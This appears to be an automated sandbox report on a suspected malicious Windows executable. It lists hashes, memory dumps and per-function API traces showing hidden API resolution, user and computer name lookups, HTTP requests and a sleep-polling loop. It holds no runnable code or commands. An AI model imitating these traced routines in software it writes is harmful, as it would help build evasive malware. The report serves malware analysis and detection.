                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateComputerNameProcess
                                        • String ID:
                                        • API String ID: 1664310425-0
                                        • Opcode ID: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                                        • Instruction ID: 7d0b16b6c39ab3ad93839439d107b9b07fd5387d70958cedee535278fff96341
                                        • Opcode Fuzzy Hash: c248f2ab3b221e8149ab55937a00a6ccd2e3a50cdbc4cca3ad9193a93d22bf26
                                        • Instruction Fuzzy Hash: 67016DB1A04308EBC710DF98ED45BABFBB8FB48B21F10425AEA45F3280D77459448BA1
                                        Function 00927850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                                        • Instruction ID: 2b6a8ffbba3985c023b497c69c69c83a45558257055455649e509b16d89d5e7f
                                        • Opcode Fuzzy Hash: abaf5480555a9bf7331650fa9a5bbcd0180de9f2ee12a649683b86a6c5122ec1
                                        • Instruction Fuzzy Hash: E3F04FB1944208ABC704DF98DD49BAEFBB8FB08712F10065AFA05A3680D77819048BA1
                                        Function 00911160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                                        • Instruction ID: cfcc766b4acd3cbf5c972b3e2987b6b7a09e52c6fdb29d910c962bd965e9d6bf
                                        • Opcode Fuzzy Hash: 1667428b634bbc42c0fce042d9e9b701208fa8e89ddf6ad0da53f931e00ee73e
                                        • Instruction Fuzzy Hash: 73D05E7490430CEBCB00DFE0D8496DDBB78FB0C312F000699D90573340EE306881CAA6
                                        Function 00929C10 Relevance: 224.7, APIs: 112, Strings: 16, Instructions: 684libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 929c10-929c1a 634 929c20-92a031 GetProcAddress * 43 633->634 635 92a036-92a0ca LoadLibraryA * 8 633->635 634->635 636 92a146-92a14d 635->636 637 92a0cc-92a141 GetProcAddress * 5 635->637 638 92a153-92a211 GetProcAddress * 8 636->638 639 92a216-92a21d 636->639 637->636 638->639 640 92a298-92a29f 639->640 641 92a21f-92a293 GetProcAddress * 5 639->641 642 92a337-92a33e 640->642 643 92a2a5-92a332 GetProcAddress * 6 640->643 641->640 644 92a344-92a41a GetProcAddress * 9 642->644 645 92a41f-92a426 642->645 643->642 644->645 646 92a4a2-92a4a9 645->646 647 92a428-92a49d GetProcAddress * 5 645->647 648 92a4ab-92a4d7 GetProcAddress * 2 646->648 649 92a4dc-92a4e3 646->649 647->646 648->649 650 92a515-92a51c 649->650 651 92a4e5-92a510 GetProcAddress * 2 649->651 652 92a612-92a619 650->652 653 92a522-92a60d GetProcAddress * 10 650->653 651->650 654 92a61b-92a678 GetProcAddress * 4 652->654 655 92a67d-92a684 652->655 653->652 654->655 656 92a686-92a699 GetProcAddress 655->656 657 92a69e-92a6a5 655->657 656->657 658 92a6a7-92a703 GetProcAddress * 4 657->658 659 92a708-92a709 657->659 658->659
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,006A57F0), ref: 00929C2D
                                        • GetProcAddress.KERNEL32(74DD0000,006A5730), ref: 00929C45
                                        • GetProcAddress.KERNEL32(74DD0000,006B96A0), ref: 00929C5E
                                        • GetProcAddress.KERNEL32(74DD0000,006B96B8), ref: 00929C76
                                        • GetProcAddress.KERNEL32(74DD0000,006B96D0), ref: 00929C8E
                                        • GetProcAddress.KERNEL32(74DD0000,006B9610), ref: 00929CA7
                                        • GetProcAddress.KERNEL32(74DD0000,006ABD88), ref: 00929CBF
                                        • GetProcAddress.KERNEL32(74DD0000,006BCFF0), ref: 00929CD7
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF90), ref: 00929CF0
                                        • GetProcAddress.KERNEL32(74DD0000,006BCDF8), ref: 00929D08
                                        • GetProcAddress.KERNEL32(74DD0000,006BD0C8), ref: 00929D20
                                        • GetProcAddress.KERNEL32(74DD0000,006A5790), ref: 00929D39
                                        • GetProcAddress.KERNEL32(74DD0000,006A5890), ref: 00929D51
                                        • GetProcAddress.KERNEL32(74DD0000,006A58B0), ref: 00929D69
                                        • GetProcAddress.KERNEL32(74DD0000,006A57D0), ref: 00929D82
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE28), ref: 00929D9A
                                        • GetProcAddress.KERNEL32(74DD0000,006BCFA8), ref: 00929DB2
                                        • GetProcAddress.KERNEL32(74DD0000,006ABAE0), ref: 00929DCB
                                        • GetProcAddress.KERNEL32(74DD0000,006A58D0), ref: 00929DE3
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE40), ref: 00929DFB
                                        • GetProcAddress.KERNEL32(74DD0000,006BCED0), ref: 00929E14
                                        • GetProcAddress.KERNEL32(74DD0000,006BD008), ref: 00929E2C
                                        • GetProcAddress.KERNEL32(74DD0000,006BCEA0), ref: 00929E44
                                        • GetProcAddress.KERNEL32(74DD0000,006A5950), ref: 00929E5D
                                        • GetProcAddress.KERNEL32(74DD0000,006BD0E0), ref: 00929E75
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE58), ref: 00929E8D
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF18), ref: 00929EA6
                                        • GetProcAddress.KERNEL32(74DD0000,006BCEE8), ref: 00929EBE
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE70), ref: 00929ED6
                                        • GetProcAddress.KERNEL32(74DD0000,006BCFC0), ref: 00929EEF
                                        • GetProcAddress.KERNEL32(74DD0000,006BD068), ref: 00929F07
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE88), ref: 00929F1F
                                        • GetProcAddress.KERNEL32(74DD0000,006BCE10), ref: 00929F38
                                        • GetProcAddress.KERNEL32(74DD0000,006BA420), ref: 00929F50
                                        • GetProcAddress.KERNEL32(74DD0000,006BCEB8), ref: 00929F68
                                        • GetProcAddress.KERNEL32(74DD0000,006BD080), ref: 00929F81
                                        • GetProcAddress.KERNEL32(74DD0000,006A58F0), ref: 00929F99
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF00), ref: 00929FB1
                                        • GetProcAddress.KERNEL32(74DD0000,006A5910), ref: 00929FCA
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF60), ref: 00929FE2
                                        • GetProcAddress.KERNEL32(74DD0000,006BCF30), ref: 00929FFA
                                        • GetProcAddress.KERNEL32(74DD0000,006A5970), ref: 0092A013
                                        • GetProcAddress.KERNEL32(74DD0000,006A5B50), ref: 0092A02B
                                        • LoadLibraryA.KERNEL32(006BCF48,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A03D
                                        • LoadLibraryA.KERNEL32(006BCF78,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A04E
                                        • LoadLibraryA.KERNEL32(006BCFD8,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A060
                                        • LoadLibraryA.KERNEL32(006BD020,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A072
                                        • LoadLibraryA.KERNEL32(006BD038,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A083
                                        • LoadLibraryA.KERNEL32(006BD050,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A095
                                        • LoadLibraryA.KERNEL32(006BD098,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0A7
                                        • LoadLibraryA.KERNEL32(006BD0B0,?,00925CA3,00930AEB,?,?,?,?,?,?,?,?,?,?,00930AEA,00930AE3), ref: 0092A0B8
                                        • GetProcAddress.KERNEL32(75290000,006A5D50), ref: 0092A0DA
                                        • GetProcAddress.KERNEL32(75290000,006BD230), ref: 0092A0F2
                                        • GetProcAddress.KERNEL32(75290000,006B90C8), ref: 0092A10A
                                        • GetProcAddress.KERNEL32(75290000,006BD2A8), ref: 0092A123
                                        • GetProcAddress.KERNEL32(75290000,006A5B90), ref: 0092A13B
                                        • GetProcAddress.KERNEL32(73440000,006AB810), ref: 0092A160
                                        • GetProcAddress.KERNEL32(73440000,006A5B70), ref: 0092A179
                                        • GetProcAddress.KERNEL32(73440000,006ABA18), ref: 0092A191
                                        • GetProcAddress.KERNEL32(73440000,006BD140), ref: 0092A1A9
                                        • GetProcAddress.KERNEL32(73440000,006BD320), ref: 0092A1C2
                                        • GetProcAddress.KERNEL32(73440000,006A5D70), ref: 0092A1DA
                                        • GetProcAddress.KERNEL32(73440000,006A5C10), ref: 0092A1F2
                                        • GetProcAddress.KERNEL32(73440000,006BD3C8), ref: 0092A20B
                                        • GetProcAddress.KERNEL32(752C0000,006A5AB0), ref: 0092A22C
                                        • GetProcAddress.KERNEL32(752C0000,006A5AF0), ref: 0092A244
                                        • GetProcAddress.KERNEL32(752C0000,006BD1B8), ref: 0092A25D
                                        • GetProcAddress.KERNEL32(752C0000,006BD3E0), ref: 0092A275
                                        • GetProcAddress.KERNEL32(752C0000,006A5D90), ref: 0092A28D
                                        • GetProcAddress.KERNEL32(74EC0000,006AB720), ref: 0092A2B3
                                        • GetProcAddress.KERNEL32(74EC0000,006AB9F0), ref: 0092A2CB
                                        • GetProcAddress.KERNEL32(74EC0000,006BD338), ref: 0092A2E3
                                        • GetProcAddress.KERNEL32(74EC0000,006A5B10), ref: 0092A2FC
                                        • GetProcAddress.KERNEL32(74EC0000,006A5C30), ref: 0092A314
                                        • GetProcAddress.KERNEL32(74EC0000,006AB658), ref: 0092A32C
                                        • GetProcAddress.KERNEL32(75BD0000,006BD278), ref: 0092A352
                                        • GetProcAddress.KERNEL32(75BD0000,006A5C50), ref: 0092A36A
                                        • GetProcAddress.KERNEL32(75BD0000,006B9098), ref: 0092A382
                                        • GetProcAddress.KERNEL32(75BD0000,006BD248), ref: 0092A39B
                                        • GetProcAddress.KERNEL32(75BD0000,006BD158), ref: 0092A3B3
                                        • GetProcAddress.KERNEL32(75BD0000,006A5DB0), ref: 0092A3CB
                                        • GetProcAddress.KERNEL32(75BD0000,006A5AD0), ref: 0092A3E4
                                        • GetProcAddress.KERNEL32(75BD0000,006BD2C0), ref: 0092A3FC
                                        • GetProcAddress.KERNEL32(75BD0000,006BD170), ref: 0092A414
                                        • GetProcAddress.KERNEL32(75A70000,006A5DD0), ref: 0092A436
                                        • GetProcAddress.KERNEL32(75A70000,006BD188), ref: 0092A44E
                                        • GetProcAddress.KERNEL32(75A70000,006BD1A0), ref: 0092A466
                                        • GetProcAddress.KERNEL32(75A70000,006BD368), ref: 0092A47F
                                        • GetProcAddress.KERNEL32(75A70000,006BD260), ref: 0092A497
                                        • GetProcAddress.KERNEL32(75450000,006A5C70), ref: 0092A4B8
                                        • GetProcAddress.KERNEL32(75450000,006A5E50), ref: 0092A4D1
                                        • GetProcAddress.KERNEL32(75DA0000,006A5CF0), ref: 0092A4F2
                                        • GetProcAddress.KERNEL32(75DA0000,006BD380), ref: 0092A50A
                                        • GetProcAddress.KERNEL32(6F070000,006A5B30), ref: 0092A530
                                        • GetProcAddress.KERNEL32(6F070000,006A5E30), ref: 0092A548
                                        • GetProcAddress.KERNEL32(6F070000,006A5BD0), ref: 0092A560
                                        • GetProcAddress.KERNEL32(6F070000,006BD1D0), ref: 0092A579
                                        • GetProcAddress.KERNEL32(6F070000,006A5D30), ref: 0092A591
                                        • GetProcAddress.KERNEL32(6F070000,006A5BB0), ref: 0092A5A9
                                        • GetProcAddress.KERNEL32(6F070000,006A5BF0), ref: 0092A5C2
                                        • GetProcAddress.KERNEL32(6F070000,006A5CD0), ref: 0092A5DA
                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0092A5F1
                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0092A607
                                        • GetProcAddress.KERNEL32(75AF0000,006BD350), ref: 0092A629
                                        • GetProcAddress.KERNEL32(75AF0000,006B90D8), ref: 0092A641
                                        • GetProcAddress.KERNEL32(75AF0000,006BD0F8), ref: 0092A659
                                        • GetProcAddress.KERNEL32(75AF0000,006BD2D8), ref: 0092A672
                                        • GetProcAddress.KERNEL32(75D90000,006A5C90), ref: 0092A693
                                        • GetProcAddress.KERNEL32(6FAD0000,006BD398), ref: 0092A6B4
                                        • GetProcAddress.KERNEL32(6FAD0000,006A5CB0), ref: 0092A6CD
                                        • GetProcAddress.KERNEL32(6FAD0000,006BD3B0), ref: 0092A6E5
                                        • GetProcAddress.KERNEL32(6FAD0000,006BD290), ref: 0092A6FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: 0Wj$0[j$0\j$0]j$0^j$HttpQueryInfoA$InternetSetOptionA$PYj$P[j$P\j$P]j$P^j$pYj$p[j$p\j$p]j
                                        • API String ID: 2238633743-3482663418
                                        • Opcode ID: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                                        • Instruction ID: e2b858503f906f26305b8b19afc1d2b9bb76853b5df5ebbe271c0f710587cd77
                                        • Opcode Fuzzy Hash: 2046b1f8efdfa64fe08eb910c540718ae06dc2f30a44e56a1bb681f435a33450
                                        • Instruction Fuzzy Hash: E16219B5510300AFD344DFA8ED98B663BF9F74C603B14879AA709E3264DE39A841DB13
                                        Function 00916280 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 916280-91630b call 92a7a0 call 9147b0 call 92a740 InternetOpenA StrCmpCA 1040 916314-916318 1033->1040 1041 91630d 1033->1041 1042 916509-916525 call 92a7a0 call 92a800 * 2 1040->1042 1043 91631e-916342 InternetConnectA 1040->1043 1041->1040 1062 916528-91652d 1042->1062 1045 916348-91634c 1043->1045 1046 9164ff-916503 InternetCloseHandle 1043->1046 1048 91635a 1045->1048 1049 91634e-916358 1045->1049 1046->1042 1051 916364-916392 HttpOpenRequestA 1048->1051 1049->1051 1053 9164f5-9164f9 InternetCloseHandle 1051->1053 1054 916398-91639c 1051->1054 1053->1046 1055 9163c5-916405 HttpSendRequestA HttpQueryInfoA 1054->1055 1056 91639e-9163bf InternetSetOptionA 1054->1056 1058 916407-916427 call 92a740 call 92a800 * 2 1055->1058 1059 91642c-91644b call 928940 1055->1059 1056->1055 1058->1062 1067 9164c9-9164e9 call 92a740 call 92a800 * 2 1059->1067 1068 91644d-916454 1059->1068 1067->1062 1071 9164c7-9164ef InternetCloseHandle 1068->1071 1072 916456-916480 InternetReadFile 1068->1072 1071->1053 1076 916482-916489 1072->1076 1077 91648b 1072->1077 1076->1077 1080 91648d-9164c5 call 92a9b0 call 92a8a0 call 92a800 1076->1080 1077->1071 1080->1072
                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                          • Part of subcall function 009147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                                        • StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916303
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                                        • HttpOpenRequestA.WININET(00000000,GET,?,006BE230,00000000,00000000,00400100,00000000), ref: 00916385
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009163FD
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0091646D
                                        • InternetCloseHandle.WININET(00000000), ref: 009164EF
                                        • InternetCloseHandle.WININET(00000000), ref: 009164F9
                                        • InternetCloseHandle.WININET(00000000), ref: 00916503
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: 0k$ERROR$ERROR$GET
                                        • API String ID: 3749127164-537840719
                                        • Opcode ID: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                                        • Instruction ID: 99a27a562cf7d962d8201b428589f20fe9ce1602b79b55104f824987cf9c4c86
                                        • Opcode Fuzzy Hash: 871e56dd5d06db53c693b9cdb1055ebacd1cdee0100909d6f5c2097972a5421e
                                        • Instruction Fuzzy Hash: A1713C71E00318ABDB24DFA0DC59BEEB778BB48701F108598F50AAB1D4DBB46A85CF51
                                        Function 00925510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1090 925510-925577 call 925ad0 call 92a820 * 3 call 92a740 * 4 1106 92557c-925583 1090->1106 1107 9255d7-92564c call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1106->1107 1108 925585-9255b6 call 92a820 call 92a7a0 call 911590 call 9251f0 1106->1108 1134 925693-9256a9 call 92aad0 StrCmpCA 1107->1134 1138 92564e-92568e call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1107->1138 1124 9255bb-9255d2 call 92a8a0 call 92a800 1108->1124 1124->1134 1139 9256af-9256b6 1134->1139 1140 9257dc-925844 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1134->1140 1138->1134 1142 9257da-92585f call 92aad0 StrCmpCA 1139->1142 1143 9256bc-9256c3 1139->1143 1269 925ac3-925ac6 1140->1269 1162 925991-9259f9 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1142->1162 1163 925865-92586c 1142->1163 1147 9256c5-925719 call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1143->1147 1148 92571e-925793 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1143->1148 1147->1142 1148->1142 1246 925795-9257d5 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1148->1246 1162->1269 1169 925872-925879 1163->1169 1170 92598f-925a14 call 92aad0 StrCmpCA 1163->1170 1177 9258d3-925948 call 92a740 * 2 call 911590 call 9252c0 call 92a8a0 call 92a800 call 92aad0 StrCmpCA 1169->1177 1178 92587b-9258ce call 92a820 call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1169->1178 1198 925a16-925a21 Sleep 1170->1198 1199 925a28-925a91 call 92a8a0 call 92a820 * 2 call 911670 call 92a800 * 4 call 926560 call 911550 1170->1199 1177->1170 1275 92594a-92598a call 92a7a0 call 911590 call 9251f0 call 92a8a0 call 92a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1142 1275->1170
                                        APIs
                                          • Part of subcall function 0092A820: lstrlen.KERNEL32(00914F05,?,?,00914F05,00930DDE), ref: 0092A82B
                                          • Part of subcall function 0092A820: lstrcpy.KERNEL32(00930DDE,00000000), ref: 0092A885
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925644
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009256A1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925857
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 009251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                          • Part of subcall function 009252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925318
                                          • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 0092532F
                                          • Part of subcall function 009252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00925364
